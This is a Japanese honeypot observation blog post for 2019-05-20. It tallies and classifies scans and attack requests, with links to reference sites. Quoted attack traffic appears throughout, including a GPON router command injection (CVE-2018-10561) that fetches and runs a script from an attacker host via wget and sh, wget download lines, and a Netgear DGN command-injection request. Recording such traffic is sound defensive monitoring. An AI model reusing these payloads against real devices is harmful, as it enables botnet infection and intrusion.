23log

WOWHoneypotで観測した日々のログをつらつらと

WOWHoneypot観察(65日目)

2019/05/20(月)

トータルは176件です。

ハンティングログは以下です。

42.116.61.238 wget hxxp://45.67.14.194/xo/gpon

www.virustotal.com

110.88.245.50 wget+hxxp://hulo.r00ts.online/.configs/Lrep

www.virustotal.com



件数 概要 リクエス
66 調査 HEAD /
52 アクセス GET /
36 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html
1 Hadoop YARN ResourceManagerの脆弱性を狙った通信 POST /ws/v1/cluster/apps/new-application
1 LinksysルータのEシリーズの脆弱性を狙った通信 POST /tmUnblock.cgi
1 MikroTikの調査 GET /winbox.png
1 ZmEuによる調査 GET /w00tw00t.at.blackhats.romanian.anti-sec:)
1 Netgear DGNデバイス脆弱性を狙った通信 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=echo%20chicken&curpath=/¤tsetting.htm=1
1 不明 GET /qnfxcjqr
1 ZmEuによるphpMyAdminの調査 GET /pma/scripts/setup.php
1 ZmEuによるphpMyAdminの調査 GET /phpmyadmin/scripts/setup.php
1 ZmEuによるphpMyAdminの調査 GET /phpMyAdmin/scripts/setup.php
1 ZmEuによるphpMyAdminの調査 GET /myadmin/scripts/setup.php
1 調査 GET /login.html
1 GPONルータの脆弱性(CVE-2018-10561)を突くMirai亜種の通信 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://45.67.14.194/xo/gpon%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$
1 不明 GET /images/logo.gif
1 不明 GET /home.asp
1 不明 GET /fdsrwe
1 不明 GET /device_description.xml
1 不明 GET /currentsetting.htm
1 不明 GET /current_config/passwd
1 AVTechを狙った通信 GET /cgi-bin/user/Config.cgi?.cab&action=get&category=Account.*
1 ZmEuによるphpMyAdminの調査 GET /MyAdmin/scripts/setup.php
1 Strutsの調査 GET /LoginPage.do
1 Gitの調査 GET /.git/config

新規で観測した通信が3つありました。


Hadoop YARN ResourceManagerの脆弱性を狙った通信

POST /ws/v1/cluster/apps/new-application HTTP/1.1
Host: *.*.*.*:8080
Content-Length: 0
User-Agent: python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.12.1.el6.x86_64
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate

www.exploit-db.com


MikroTikの調査

GET /winbox.png HTTP/1.1
Host: *.*.*.*
Accept-Encoding: identity

wiki.mikrotik.com


Netgear DGNデバイス脆弱性を狙った通信

GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=echo%20chicken&curpath=/¤tsetting.htm=1 HTTP/1.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: /
User-Agent: Mozilla/5.0

www.exploit-db.com